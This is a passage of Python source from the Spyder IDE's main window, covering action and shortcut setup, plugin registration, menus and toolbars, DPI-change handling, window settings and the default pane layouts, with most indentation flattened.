self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
(_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars")),
icon=ima.icon('lock' if self.interface_locked else 'lock_open'),
triggered=lambda checked:
self.toggle_lock(not self.interface_locked),
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
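        # Edit actions are dispatched to the widget with focus through
        # global_callback, using the method name derived from `text`
        # (e.g. 'Select All' -> 'selectAll')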
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Toolbars
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Internal console plugin
from spyder.plugins.console.plugin import Console
self.console = Console(self, configuration=CONF)
self.register_plugin(self.console)
# StatusBar plugin
from spyder.plugins.statusbar.plugin import StatusBar
self.statusbar = StatusBar(self, configuration=CONF)
self.register_plugin(self.statusbar)
# Run plugin
from spyder.plugins.run.plugin import Run
self.run = Run(self, configuration=CONF)
self.register_plugin(self.run)
# Appearance plugin
from spyder.plugins.appearance.plugin import Appearance
self.appearance = Appearance(self, configuration=CONF)
self.register_plugin(self.appearance)
# Main interpreter
from spyder.plugins.maininterpreter.plugin import MainInterpreter
self.maininterpreter = MainInterpreter(self, configuration=CONF)
self.register_plugin(self.maininterpreter)
# Code completion client initialization
from spyder.plugins.completion.plugin import CompletionPlugin
self.completions = CompletionPlugin(self, configuration=CONF)
self.register_plugin(self.completions)
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
self.add_plugin(self.outlineexplorer)
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
self.add_plugin(self.editor)
self.preferences.register_plugin_preferences(self.editor)
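        # Add the switcher actions to the File menu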
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
self.mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
self.add_plugin(self.ipyconsole)
self.preferences.register_plugin_preferences(self.ipyconsole)
# Variable Explorer
self.set_splash(_("Loading Variable Explorer..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self, configuration=CONF)
self.register_plugin(self.variableexplorer)
# Help plugin
# TODO: There is a circular dependency between help and ipython since
# ipython console uses css_path.
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
from spyder.plugins.help.plugin import Help
self.help = Help(self, configuration=CONF)
self.register_plugin(self.help)
# Application plugin
from spyder.plugins.application.plugin import Application
self.application = Application(self, configuration=CONF)
self.register_plugin(self.application)
# Tools + External Tools (some of this depends on the Application
# plugin)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
self.mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
self.mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
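        # Text, icon and tooltip are set below by __update_maximize_action()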
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
if sys.platform == 'darwin':
self.fullscreen_action.setEnabled(False)
self.fullscreen_action.setToolTip(_("For fullscreen mode use "
"macOS built-in feature"))
else:
self.register_shortcut(
self.fullscreen_action,
"_",
"Fullscreen mode",
add_shortcut_to_tip=True
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
for main_layout_action in [self.maximize_action,
self.fullscreen_action]:
self.toolbar.add_item_to_application_toolbar(
main_layout_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.LayoutSection,
before_section=MainToolbarSections.ApplicationSection)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
# History log widget
if CONF.get('historylog', 'enable'):
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self, configuration=CONF)
self.register_plugin(self.historylog)
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self, configuration=CONF)
self.register_plugin(self.plots)
# Explorer
if CONF.get('explorer', 'enable'):
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self, configuration=CONF)
self.register_plugin(self.explorer)
# Online help widget
if CONF.get('onlinehelp', 'enable'):
from spyder.plugins.onlinehelp.plugin import OnlineHelp
self.onlinehelp = OnlineHelp(self, configuration=CONF)
self.register_plugin(self.onlinehelp)
# Working directory plugin
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
CONF.set('workingdir', 'init_workdir', self.init_workdir)
self.workingdirectory = WorkingDirectory(self, configuration=CONF)
self.register_plugin(self.workingdirectory)
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
self.add_plugin(self.projects)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self, configuration=CONF)
self.register_plugin(self.findinfiles)
# Breakpoints
if CONF.get('breakpoints', 'enable'):
from spyder.plugins.breakpoints.plugin import Breakpoints
self.breakpoints = Breakpoints(self, configuration=CONF)
self.register_plugin(self.breakpoints)
self.thirdparty_plugins.append(self.breakpoints)
# Profiler plugin
if CONF.get('profiler', 'enable'):
from spyder.plugins.profiler.plugin import Profiler
self.profiler = Profiler(self, configuration=CONF)
self.register_plugin(self.profiler)
self.thirdparty_plugins.append(self.profiler)
# Code analysis
if CONF.get("pylint", "enable"):
from spyder.plugins.pylint.plugin import Pylint
self.pylint = Pylint(self, configuration=CONF)
self.register_plugin(self.pylint)
self.thirdparty_plugins.append(self.pylint)
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# New API: Load and register external plugins
external_plugins = find_external_plugins()
plugin_deps = solve_plugin_dependencies(external_plugins.values())
for plugin_class in plugin_deps:
if issubclass(plugin_class, SpyderPluginV2):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
# TODO: Once all the related plugins are migrated, and they add
# their own actions, this can be removed.
#----- Tours
# TODO: Move to plugin
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
self.mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
self.mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# ----- View
# View menu
# Menus
self.plugins_menu = SpyderMenu(parent=self, title=_("Panes"))
self.quick_layout_menu = SpyderMenu(
parent=self,
title=_("Window layouts"))
self.quick_layout_set_menu()
# Panes section
self.mainmenu.add_item_to_application_menu(
self.plugins_menu,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
self.mainmenu.add_item_to_application_menu(
self.lock_interface_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
self.mainmenu.add_item_to_application_menu(
self.close_dockwidget_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
self.mainmenu.add_item_to_application_menu(
self.maximize_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
# Toolbar section
self.mainmenu.add_item_to_application_menu(
self.toolbar.toolbars_menu,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Toolbar)
self.mainmenu.add_item_to_application_menu(
self.toolbar.show_toolbars_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Toolbar)
# Layout section
self.mainmenu.add_item_to_application_menu(
self.quick_layout_menu,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Layout)
self.mainmenu.add_item_to_application_menu(
self.toggle_previous_layout_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Layout)
self.mainmenu.add_item_to_application_menu(
self.toggle_next_layout_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Layout)
# Bottom section
self.mainmenu.add_item_to_application_menu(
self.fullscreen_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Bottom)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
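        # Tabify external dockable plugins and hide them by default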
        for plugin_name, plugin_instance in self._EXTERNAL_PLUGINS.items():
            if isinstance(plugin_instance, SpyderDockablePlugin):
                self.tabify_plugin(plugin_instance)
                plugin_instance.toggle_view(False)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
regex = re.compile(r'.*_.*_(\d+)[.]log')
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
            t.daemon = True
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
# Update lock status
self.toggle_lock(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
            # Activate HDPI auto-scaling option since it is needed for
            # proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
            msgbox.setText(
                _("A monitor scale change was detected. <br><br>"
                  "We recommend restarting Spyder to ensure that it's "
                  "properly displayed. If you don't want to do that, please "
                  "be sure to activate the option<br><br><tt>Enable auto "
                  "high DPI scaling</tt><br><br>in <tt>Preferences > General "
                  "> Interface</tt>, in case Spyder is not displayed "
                  "correctly.<br><br>"
                  "Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def load_window_settings(self, prefix, default=False, section='main'):
"""
Load window layout settings from userconfig-based configuration
with `prefix`, under `section`.
Parameters
----------
default: bool
If True, do not restore inner layout.
"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix + 'size')
prefs_dialog_size = get_func(section, prefix + 'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix + 'state', None)
pos = get_func(section, prefix + 'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See spyder-ide/spyder#3748.
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix + 'position')
is_maximized = get_func(section, prefix + 'is_maximized')
is_fullscreen = get_func(section, prefix + 'is_fullscreen')
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def get_window_settings(self):
"""
Return current window settings.
Symmetric to the 'set_window_settings' setter.
"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(
self.saveState(version=WINDOW_STATE_VERSION)
)
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""
Set window settings.
Symmetric to the 'get_window_settings' accessor.
"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
hexstate_valid = self.restoreState(
QByteArray().fromHex(str(hexstate).encode('utf-8')),
version=WINDOW_STATE_VERSION
)
# Check layout validity. Spyder 4 uses the version 0 state,
# whereas Spyder 5 will use version 1 state. For more info see the
# version argument for QMainWindow.restoreState:
# https://doc.qt.io/qt-5/qmainwindow.html#restoreState
if not hexstate_valid:
self.setUpdatesEnabled(True)
self.setup_layout(default=True)
return
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""
Save current window settings with `prefix` in
the userconfig-based configuration, under `section`.
"""
# Use current size and position when saving window settings.
# Fixes spyder-ide/spyder#13882
win_size = self.size()
pos = self.pos()
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix + 'size',
(win_size.width(), win_size.height()))
CONF.set(section, prefix + 'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix + 'is_maximized', self.isMaximized())
CONF.set(section, prefix + 'is_fullscreen', self.isFullScreen())
CONF.set(section, prefix + 'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState(version=WINDOW_STATE_VERSION)
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix + 'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwidgets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
            for index, name in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
# Old API
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin._initialize_plugin_in_mainwindow_layout()
except AttributeError:
pass
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin._ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns, each column is organized by rows.
        # Column widths have to add up to 100 (except for hidden widgets),
        # and the row heights of each column have to add up to 100 as well
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [15, # Column 0 width
45, # Column 1 width
5, # Column 2 width
45], # Column 3 width
'height fraction': [[100], # Column 0, row heights
[100], # Column 1, row heights
[100], # Column 2, row heights
[46, 54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [10, # Column 0 width
45, # Column 1 width
45], # Column 2 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45], # Column 1, row heights
[55, 45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
